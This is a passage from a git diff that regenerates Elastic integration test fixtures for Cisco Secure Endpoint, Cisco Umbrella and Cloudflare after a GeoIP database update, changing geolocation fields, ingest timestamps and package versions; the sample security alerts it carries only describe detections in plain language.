":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\",\"sha1\":\"c78f4c22dd195a1791472a2c271a0c85b53900d9\",\"md5\":\"75a758a0c5cea48c9922d64a113d0f9d\"},\"parent\":{\"process_id\":480,\"disposition\":\"Clean\",\"file_name\":\"services.exe\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\",\"sha1\":\"ff658a36899e43fec3966d608b4aa4472de7a378\",\"md5\":\"71c85477df9347fe8e7bc55768473fca\"}}}}}", "code": "1090519105", "kind": "alert", @@ -3472,7 +3472,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389140300Z", + "ingested": "2021-12-14T14:41:01.444877189Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6701398782847286000,\"timestamp\":1610621970,\"timestamp_nanoseconds\":182000000,\"date\":\"2021-01-14T10:59:30+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621970,\"start_date\":\"2021-01-14T10:59:30+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.\",\"short_description\":\"W32.PossibleRansomwareShadowCopyDeletion.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"vssadmin.exe\",\"file_path\":\"file:///C%3A/Windows/SysWOW64/vssadmin.exe\",\"identity\":{\"sha256\":\"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3559,7 +3559,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389145700Z", + "ingested": "2021-12-14T14:41:01.444877825Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":7007136036637603000,\"timestamp\":1610621707,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-14T10:55:07+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621707,\"start_date\":\"2021-01-14T10:55:07+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.\",\"short_description\":\"W32.PowershellEncodedBuffer.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"file:///C%3A/Windows/system32/cmd.exe\",\"identity\":{\"sha256\":\"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3646,7 +3646,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389151Z", + "ingested": "2021-12-14T14:41:01.444878368Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3733,7 +3733,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:55.389158400Z", + "ingested": "2021-12-14T14:41:01.444878764Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3813,7 +3813,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389163900Z", + "ingested": "2021-12-14T14:41:01.444879233Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "2164260893", "kind": "alert", @@ -3889,7 +3889,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389168400Z", + "ingested": "2021-12-14T14:41:01.444879620Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648155", "kind": "alert", @@ -3967,7 +3967,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:55.389171700Z", + "ingested": "2021-12-14T14:41:01.444880105Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "code": "553648147", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/manifest.yml b/packages/cisco_secure_endpoint/manifest.yml index 6d67c67a9d9..f7142c4a834 100644 --- a/packages/cisco_secure_endpoint/manifest.yml +++ b/packages/cisco_secure_endpoint/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_secure_endpoint title: Cisco Secure Endpoint (AMP) -version: 0.2.1 +version: 0.2.2 license: basic description: Collect logs from Cisco Secure Endpoint (AMP) with Elastic Agent. type: integration diff --git a/packages/cisco_umbrella/changelog.yml b/packages/cisco_umbrella/changelog.yml index 42403e4c385..69fafc6722a 100644 --- a/packages/cisco_umbrella/changelog.yml +++ b/packages/cisco_umbrella/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.3.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.3.1" changes: - description: Change test public IPs to the supported subset diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json index cbdc4dc63e4..47d1aa5f137 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json @@ -2,6 +2,18 @@ "expected": [ { "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -36,7 +48,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:00.078901200Z", + "ingested": "2021-12-14T14:41:06.773947594Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW", "category": "network", "type": [ @@ -56,6 +68,18 @@ }, { "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -90,7 +114,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:00.078910500Z", + "ingested": "2021-12-14T14:41:06.773950384Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK", "category": "network", "type": [ diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index 34b09248e46..b5bc283c3ba 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json @@ -12,20 +12,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -58,7 +52,7 @@ }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-12-09T13:36:00.307612100Z", + "ingested": "2021-12-14T14:41:07.042646644Z", "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "category": "network", "type": [ @@ -92,6 +86,18 @@ "response_code": "NOERROR" }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -122,7 +128,7 @@ }, "event": { "action": "dns-request-Blocked", - "ingested": "2021-12-09T13:36:00.307621100Z", + "ingested": "2021-12-14T14:41:07.042649340Z", "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "category": "network", "type": [ @@ -158,26 +164,32 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "ip": "81.2.69.144" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.12", "ip": "67.43.156.12" }, @@ -207,7 +219,7 @@ }, "event": { "action": "dns-request-Allowed", - "ingested": "2021-12-09T13:36:00.307627300Z", + "ingested": "2021-12-14T14:41:07.042649780Z", "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "category": "network", "type": [ diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 41f801dd7e7..cdbf6e9aabf 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json @@ -1,23 +1,32 @@ { "expected": [ { + "observer": { + "type": "firewall", + "product": "Umbrella", + "vendor": "Cisco" + }, + "@timestamp": "2020-08-26T20:32:46.000Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "81.2.69.144" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -29,15 +38,30 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, + "event": { + "category": "network", + "ingested": "2021-12-14T14:41:08.374045169Z", + "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" + }, + "cisco": { + "umbrella": { + "categories": "Test Category" + } + }, + "user": { + "name": "elasticuser" + }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "Umbrella", "vendor": "Cisco" }, - "@timestamp": "2020-08-26T20:32:46.000Z", + "@timestamp": "2020-08-26T20:32:45.000Z", "ecs": { "version": "1.12.0" }, @@ -47,38 +71,17 @@ "81.2.69.144" ] }, - "event": { - "category": "network", - "ingested": "2021-12-09T13:36:00.633448800Z", - "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" - }, - "cisco": { - "umbrella": { - "categories": "Test Category" - } - }, - "user": { - "name": "elasticuser" - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -90,27 +93,9 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "type": "firewall", - "product": "Umbrella", - "vendor": "Cisco" - }, - "@timestamp": "2020-08-26T20:32:45.000Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "81.2.69.144" - ] - }, "event": { "category": "network", - "ingested": "2021-12-09T13:36:00.633453600Z", + "ingested": "2021-12-14T14:41:08.374049248Z", "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\"" }, "cisco": { @@ -120,7 +105,10 @@ }, "user": { "name": "elasticuser" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index 0cfea734175..cbac8ff7c6b 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -4,20 +4,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -69,7 +63,7 @@ } }, "event": { - "ingested": "2021-12-09T13:36:00.832430Z", + "ingested": "2021-12-14T14:41:08.650910742Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "category": "network", "type": [ @@ -104,20 +98,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -169,7 +157,7 @@ } }, "event": { - "ingested": "2021-12-09T13:36:00.832441Z", + "ingested": "2021-12-14T14:41:08.650913272Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "category": "network", "type": [ @@ -248,7 +236,7 @@ } }, "event": { - "ingested": "2021-12-09T13:36:00.832447300Z", + "ingested": "2021-12-14T14:41:08.650913743Z", "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"", "category": "network", "type": [ diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml index 4111e9894d2..1acfe82bf85 100644 --- a/packages/cisco_umbrella/manifest.yml +++ b/packages/cisco_umbrella/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: cisco_umbrella title: Cisco Umbrella -version: 0.3.1 +version: 0.3.2 license: basic description: Collect logs from Cisco Umbrella with Elastic Agent. type: integration diff --git a/packages/cloudflare/changelog.yml b/packages/cloudflare/changelog.yml index 4d2a65f0055..ebae6fba1b9 100644 --- a/packages/cloudflare/changelog.yml +++ b/packages/cloudflare/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.2.0" changes: - description: Add audit logs diff --git a/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json b/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json index 81b2b8aace5..e645faa0195 100644 --- a/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json +++ b/packages/cloudflare/data_stream/audit/_dev/test/pipeline/test-audit.log-expected.json @@ -19,14 +19,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -38,6 +38,20 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389077270Z", + "original": 